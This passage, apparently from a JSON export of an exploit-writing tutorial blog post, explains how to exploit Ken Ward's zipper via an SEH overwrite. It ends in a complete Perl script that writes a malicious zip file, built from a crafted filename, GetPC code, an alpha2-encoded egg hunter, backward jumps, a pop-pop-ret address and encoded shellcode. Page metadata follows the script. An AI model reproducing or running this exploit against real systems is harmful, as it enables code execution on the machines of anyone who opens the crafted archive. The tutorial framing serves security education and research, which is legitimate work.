address right after the GetPC routine.&#160; So if you put your alpha2 encoded shellcode right after the GetPC code (shellcode encoded with ESI as basereg of course), then we win !&#160; The two inc ecx instructions clobber ECX, which does not matter here : the alpha2 decoder starts by copying its base register into ECX itself (push esi \/ pop ecx, the &quot;VY&quot; at the start of the encoded egg hunter below).<\/p>\n<h3>Putting things together : Ken Ward zipper exploit : improved version<\/h3>\n<p>The payload structure, based on the knowledge we gained in the first article (abysssec.com), will look like this :<\/p>\n<p>[ 1022 bytes to hit SE record] [ nseh ] [ seh ] [ junk ]<\/p>\n<p>where<\/p>\n<p>1022 bytes consist of<\/p>\n<ul>\n<li>filename <\/li>\n<li>plenty of nops&#160; (0x90 gets converted to something else, so we'll use nop-alikes such as 0x41, inc ecx) 
<\/li>\n<li>GetPC code <\/li>\n<li>encoded egg hunter (alpha2, base register ESI) <\/li>\n<li>a few nops <\/li>\n<li>far jump backward (to land in the nops before the GetPC code) <\/li>\n<\/ul>\n<p>at nseh, we will make a short jump back (0x89 0x93, which becomes eb f4 : jmp -12), landing in the nops before the far jump backward.&#160; The far jump (200 bytes back) lands in the nops before the GetPC code, which then runs straight into the encoded egg hunter.<\/p>\n<p>we will overwrite seh with an address from zip4.exe (including null byte), written as 0x0046AFA3 so that it reads 0x0046BBFA after conversion<\/p>\n<p>junk : some nops + double tag (needed for egg hunter) + shellcode<\/p>\n<p>After translating that into perl code, the exploit script will look like this :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\"># Exploit script for Ken Ward's zipper\n# Taking advantage of payload conversion\n# (improved version)\n# Written by Peter Van Eeckhoutte\n# http:\/\/www.corelan.be:8800\n#---------------------------------------------------\nuse strict;\nuse warnings;\n\nmy $sploitfile=&quot;corelan_kenward.zip&quot;;\n\n# zip local file header (30 bytes), filename length 0x0fe4 = 4068\nmy $ldf_header = &quot;\\x50\\x4B\\x03\\x04\\x14\\x00\\x00&quot;.\n&quot;\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00&quot; .\n&quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot; .\n&quot;\\xe4\\x0f&quot; .\n&quot;\\x00\\x00\\x00&quot;;\n\n# zip central directory header (46 bytes), same filename length\nmy $cdf_header = &quot;\\x50\\x4B\\x01\\x02\\x14\\x00\\x14&quot;.\n&quot;\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00&quot; .\n&quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;.\n&quot;\\xe4\\x0f&quot;.\n&quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00&quot;.\n&quot;\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;;\n\n# end of central directory record (22 bytes) : 1 entry,\n# central directory size 0x1012 (46 + 4068) at offset 0x1002 (30 + 4068)\nmy $eofcdf_header = &quot;\\x50\\x4B\\x05\\x06\\x00\\x00\\x00&quot;.\n&quot;\\x00\\x01\\x00\\x01\\x00&quot;.\n&quot;\\x12\\x10\\x00\\x00&quot;.\n&quot;\\x02\\x10\\x00\\x00&quot;.\n&quot;\\x00\\x00&quot;;\n\nprint &quot;[+] Preparing payload\\n&quot;;\n\nmy $size=4064;     # filename length, without the .txt extension\nmy $offset=1022;   # bytes needed to reach the SEH record\n#alphanum GetPC code\n#written by Peter Van Eeckhoutte\nmy $getpc =\n&quot;\\x89\\x05&quot;.   #becomes eb 05 : jmp short (5 bytes) to the call at the end\n&quot;\\x5e&quot;.       #pop esi\n&quot;\\x41&quot;.       #nop (inc ecx)\n&quot;\\x98\\x99&quot;.   #becomes ff d6 : call esi\n&quot;\\x41&quot;.       #nop (inc ecx)\n&quot;\\x8a\\x94\\x98\\x98\\x98&quot;;  #becomes e8 f6 ff ff ff : call back (-10) to pop esi\nmy $filename=  &quot;Admin accounts and passwords.txt&quot;.(&quot; &quot; x 100);\n#alpha2 encoded egg hunter - w00t - basereg ESI\nmy $egghunter=&quot;VYIIIIIIIIIIIIIIII7QZjAXP0A0&quot;.\n&quot;AkAAQ2AB2BB0BBABXP8ABuJIQvmQ&quot;.\n&quot;kzKOTOsr2rbJC2pXxM4nUlWupZSD&quot;.\n&quot;ZOlx0wtpVP1dnkZZLosEyzlosEm7&quot;.\n&quot;KOM7A&quot;;\nmy $jmpback=&quot;\\x82\\x38\\x98\\x98\\x98&quot;;  #becomes e9 38 ff ff ff : jump back 200 bytes\nmy $nops2=&quot;A&quot; x 10;\nmy $nops1=&quot;A&quot; x ($offset-length($filename.$getpc.$egghunter.$nops2.$jmpback));\nmy $part1 = $filename.$nops1.$getpc.$egghunter.$nops2.$jmpback;\nmy $nseh=&quot;\\x89\\x93\\x41\\x41&quot;;  #becomes eb f4 : jump back 12 bytes\nmy $seh=pack('V',0x0046AFA3);    #becomes 0x0046BBFA : pop pop ret in zip4.exe\nmy $payload = $part1.$nseh.$seh;\n# double tag for the egg hunter, followed by the encoded shellcode\n# (this copy is found unmodified in memory, so it needs no conversion tricks)\nmy $shellcode=&quot;w00tw00t&quot;.&quot;\\x89\\xe2\\xda\\xdc\\xd9\\x72\\xf4\\x5f\\x57\\x59\\x49\\x49\\x49\\x49&quot; .\n&quot;\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56&quot; .\n&quot;\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41&quot; .\n&quot;\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42&quot; .\n&quot;\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x49\\x49\\x4a&quot; .\n&quot;\\x4b\\x4d\\x4b\\x48\\x59\\x43\\x44\\x46\\x44\\x4a\\x54\\x46\\x51\\x4e&quot; .\n&quot;\\x32\\x4e\\x52\\x43\\x4a\\x50\\x31\\x49\\x59\\x42\\x44\\x4c\\x4b\\x44&quot; .\n&quot;\\x31\\x46\\x50\\x4c\\x4b\\x43\\x46\\x44\\x4c\\x4c\\x4b\\x43\\x46\\x45&quot; .\n&quot;\\x4c\\x4c\\x4b\\x47\\x36\\x45\\x58\\x4c\\x4b\\x43\\x4e\\x47\\x50\\x4c&quot; .\n&quot;\\x4b\\x46\\x56\\x47\\x48\\x50\\x4f\\x44\\x58\\x44\\x35\\x4c\\x33\\x50&quot; .\n&quot;\\x59\\x45\\x51\\x4e\\x31\\x4b\\x4f\\x4d\\x31\\x43\\x50\\x4c\\x4b\\x42&quot; .\n&quot;\\x4c\\x47\\x54\\x51\\x34\\x4c\\x4b\\x47\\x35\\x47\\x4c\\x4c\\x4b\\x46&quot; .\n&quot;\\x34\\x44\\x45\\x42\\x58\\x43\\x31\\x4b\\x5a\\x4c\\x4b\\x51\\x5a\\x44&quot; .\n&quot;\\x58\\x4c\\x4b\\x50\\x5a\\x47\\x50\\x43\\x31\\x4a\\x4b\\x4b\\x53\\x47&quot; .\n&quot;\\x47\\x50\\x49\\x4c\\x4b\\x47\\x44\\x4c\\x4b\\x45\\x51\\x4a\\x4e\\x50&quot; .\n&quot;\\x31\\x4b\\x4f\\x46\\x51\\x4f\\x30\\x4b\\x4c\\x4e\\x4c\\x4b\\x34\\x4f&quot; .\n&quot;\\x30\\x43\\x44\\x44\\x4a\\x49\\x51\\x48\\x4f\\x44\\x4d\\x45\\x51\\x4f&quot; .\n&quot;\\x37\\x4a\\x49\\x4a\\x51\\x4b\\x4f\\x4b\\x4f\\x4b\\x4f\\x47\\x4b\\x43&quot; .\n&quot;\\x4c\\x46\\x44\\x46\\x48\\x44\\x35\\x49\\x4e\\x4c\\x4b\\x50\\x5a\\x47&quot; .\n&quot;\\x54\\x45\\x51\\x4a\\x4b\\x45\\x36\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c&quot; .\n&quot;\\x4b\\x51\\x4a\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c\\x4b\\x45\\x54\\x4c&quot; .\n&quot;\\x4b\\x45\\x51\\x4d\\x38\\x4c\\x49\\x51\\x54\\x46\\x44\\x45\\x4c\\x43&quot; .\n&quot;\\x51\\x49\\x53\\x4e\\x52\\x43\\x38\\x46\\x49\\x49\\x44\\x4c\\x49\\x4a&quot; .\n&quot;\\x45\\x4d\\x59\\x48\\x42\\x42\\x48\\x4c\\x4e\\x50\\x4e\\x44\\x4e\\x4a&quot; .\n&quot;\\x4c\\x46\\x32\\x4b\\x58\\x4d\\x4c\\x4b\\x4f\\x4b\\x4f\\x4b\\x4f\\x4d&quot; .\n&quot;\\x59\\x47\\x35\\x44\\x44\\x4f\\x4b\\x43\\x4e\\x48\\x58\\x4d\\x32\\x44&quot; .\n&quot;\\x33\\x4c\\x47\\x45\\x4c\\x51\\x34\\x51\\x42\\x4b\\x58\\x4c\\x4b\\x4b&quot; .\n&quot;\\x4f\\x4b\\x4f\\x4b\\x4f\\x4d\\x59\\x47\\x35\\x45\\x58\\x42\\x48\\x42&quot; .\n&quot;\\x4c\\x42\\x4c\\x47\\x50\\x4b\\x4f\\x42\\x48\\x46\\x53\\x50\\x32\\x46&quot; .\n&quot;\\x4e\\x43\\x54\\x45\\x38\\x43\\x45\\x42\\x53\\x45\\x35\\x43\\x42\\x4b&quot; .\n&quot;\\x38\\x51\\x4c\\x51\\x34\\x45\\x5a\\x4c\\x49\\x4b\\x56\\x50\\x56\\x4b&quot; .\n&quot;\\x4f\\x50\\x55\\x44\\x44\\x4b\\x39\\x4f\\x32\\x46\\x30\\x4f\\x4b\\x4e&quot; .\n&quot;\\x48\\x49\\x32\\x50\\x4d\\x4f\\x4c\\x4d\\x57\\x45\\x4c\\x51\\x34\\x46&quot; .\n&quot;\\x32\\x4b\\x58\\x51\\x4e\\x4b\\x4f\\x4b\\x4f\\x4b\\x4f\\x45\\x38\\x42&quot; .\n&quot;\\x4c\\x45\\x31\\x42\\x4e\\x46\\x38\\x42\\x48\\x51\\x53\\x42\\x4f\\x42&quot; .\n&quot;\\x52\\x45\\x35\\x50\\x31\\x49\\x4b\\x4d\\x58\\x51\\x4c\\x46\\x44\\x44&quot; .\n&quot;\\x47\\x4d\\x59\\x4d\\x33\\x43\\x58\\x45\\x31\\x42\\x4e\\x51\\x48\\x51&quot; .\n&quot;\\x30\\x43\\x58\\x42\\x4f\\x44\\x32\\x42\\x45\\x42\\x4c\\x45\\x38\\x42&quot; .\n&quot;\\x42\\x43\\x49\\x47\\x50\\x50\\x43\\x45\\x38\\x42\\x4e\\x43\\x55\\x45&quot; .\n&quot;\\x34\\x51\\x30\\x42\\x48\\x42\\x4e\\x47\\x50\\x44\\x30\\x43\\x47\\x45&quot; .\n&quot;\\x38\\x47\\x50\\x42\\x42\\x43\\x55\\x45\\x35\\x43\\x58\\x43\\x58\\x45&quot; .\n&quot;\\x31\\x42\\x56\\x43\\x55\\x42\\x48\\x46\\x39\\x42\\x4f\\x43\\x45\\x51&quot; .\n&quot;\\x30\\x50\\x31\\x4f\\x39\\x4c\\x48\\x50\\x4c\\x47\\x54\\x45\\x4e\\x4d&quot; .\n&quot;\\x59\\x4b\\x51\\x50\\x31\\x4e\\x32\\x50\\x52\\x51\\x43\\x50\\x51\\x46&quot; .\n&quot;\\x32\\x4b\\x4f\\x48\\x50\\x50\\x31\\x49\\x50\\x50\\x50\\x4b\\x4f\\x50&quot; .\n&quot;\\x55\\x44\\x48\\x45\\x5a\\x41\\x41&quot;;\n\nmy $rest = &quot;D&quot; x ($size-length($payload.$shellcode));\n$payload=$payload.$rest.$shellcode.&quot;.txt&quot;;\n\nmy $evilzip = $ldf_header.$payload.\n              $cdf_header.$payload.\n              $eofcdf_header;\n\nprint &quot;[+] Removing old zip file\\n&quot;;\nunlink $sploitfile if -e $sploitfile;\nprint &quot;[+] Writing payload to file\\n&quot;;\nopen(my $fh, '&gt;', $sploitfile) or die &quot;Cannot open $sploitfile : $!&quot;;\nbinmode($fh);    # raw bytes, no newline translation on Windows\nprint $fh $evilzip;\nclose($fh);\nprint &quot;[+] Wrote &quot;.length($evilzip).&quot; bytes to file $sploitfile\\n&quot;;\nprint &quot;[+] Payload length : &quot; . length($payload).&quot;\\n&quot;;<\/pre>\n<p>Result : no more complex decoders or register alignment tricks, just a combination of simple logic and compensating for the character conversion :<\/p>\n<p><a href=\"\/wp-content\/uploads\/2010\/03\/image33.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px\" title=\"image\" border=\"0\" alt=\"image\" src=\"\/wp-content\/uploads\/2010\/03\/image_thumb64.png\" width=\"462\" height=\"303\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the article I wrote on the abysssec.com website, I explained the steps and techniques needed 
to build a working exploit for Ken Ward's zipper. One of the main difficulties I had to overcome when building the exploit, was the character set limitation.&#160; I basically could only use a subset of the ascii characters (only &hellip; <a href=\"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Exploiting Ken Ward Zipper : Taking advantage of payload conversion\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":true,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[244,245,127],"tags":[3736,2786,2096,1865,1834],"class_list":["post-3530","post","type-post","status-publish","format-standard","hentry","category-exploit-writing-tutorials","category-exploits","category-security","tag-encoder-decoder","tag-egghunter","tag-alphanumeric","tag-seh","tag-shellcode"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" 
href=\"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"In the article I wrote on the abysssec.com website, I explained the steps and techniques needed to build a working exploit for Ken Ward&#039;s zipper. One of the main difficulties I had to overcome when building the exploit, was the character set limitation.&#160; I basically could only use a subset of the ascii characters (only &hellip; Continue reading &quot;Exploiting Ken Ward Zipper : Taking advantage of payload conversion&quot;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:published_time\" content=\"2010-03-27T12:28:49+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png\" \/>\n<meta name=\"author\" content=\"corelanc0d3r\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@corelanc0d3r\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" 
class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\"},\"author\":{\"name\":\"corelanc0d3r\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\"},\"headline\":\"Exploiting Ken Ward Zipper : Taking advantage of payload conversion\",\"datePublished\":\"2010-03-27T12:28:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\"},\"wordCount\":2182,\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.digiprove.com\\\/images\\\/dp_seal_trans_16x16.png\",\"keywords\":[\"encoder decoder\",\"egghunter\",\"alphanumeric\",\"seh\",\"shellcode\"],\"articleSection\":[\"Exploit Writing Tutorials\",\"Exploits\",\"Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\",\"name\":\"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability 
Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.digiprove.com\\\/images\\\/dp_seal_trans_16x16.png\",\"datePublished\":\"2010-03-27T12:28:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#primaryimage\",\"url\":\"http:\\\/\\\/www.digiprove.com\\\/images\\\/dp_seal_trans_16x16.png\",\"contentUrl\":\"http:\\\/\\\/www.digiprove.com\\\/images\\\/dp_seal_trans_16x16.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/03\\\/27\\\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploiting Ken Ward Zipper : Taking advantage of payload conversion\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes 
in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity 
Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\",\"name\":\"corelanc0d3r\",\"pronouns\":\"he\\\/him\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"caption\":\"corelanc0d3r\"},\"description\":\"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.\",\"sameAs\":[\"https:\\\/\\\/www.corelan-training.com\",\"https:\\\/\\\/instagram.com\\\/corelanc0d3r\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/petervaneeckhoutte\\\/\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\"],\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/author\\\/admin0\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","og_locale":"en_US","og_type":"article","og_title":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability Research","og_description":"In the article I wrote on the abysssec.com website, I explained the steps and techniques needed to build a working exploit for Ken Ward's zipper. One of the main difficulties I had to overcome when building the exploit, was the character set limitation.&#160; I basically could only use a subset of the ascii characters (only &hellip; Continue reading \"Exploiting Ken Ward Zipper : Taking advantage of payload conversion\"","og_url":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","og_site_name":"Corelan | Exploit Development &amp; Vulnerability 
Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_published_time":"2010-03-27T12:28:49+00:00","og_image":[{"url":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png","type":"","width":"","height":""}],"author":"corelanc0d3r","twitter_card":"summary_large_image","twitter_creator":"@corelanc0d3r","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"TechArticle","@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#article","isPartOf":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/"},"author":{"name":"corelanc0d3r","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f"},"headline":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion","datePublished":"2010-03-27T12:28:49+00:00","mainEntityOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/"},"wordCount":2182,"publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#primaryimage"},"thumbnailUrl":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png","keywords":["encoder decoder","egghunter","alphanumeric","seh","shellcode"],"articleSection":["Exploit Writing Tutorials","Exploits","Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","url":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","name":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion - Corelan | Exploit Development &amp; Vulnerability 
Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#primaryimage"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#primaryimage"},"thumbnailUrl":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png","datePublished":"2010-03-27T12:28:49+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#primaryimage","url":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png","contentUrl":"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals 
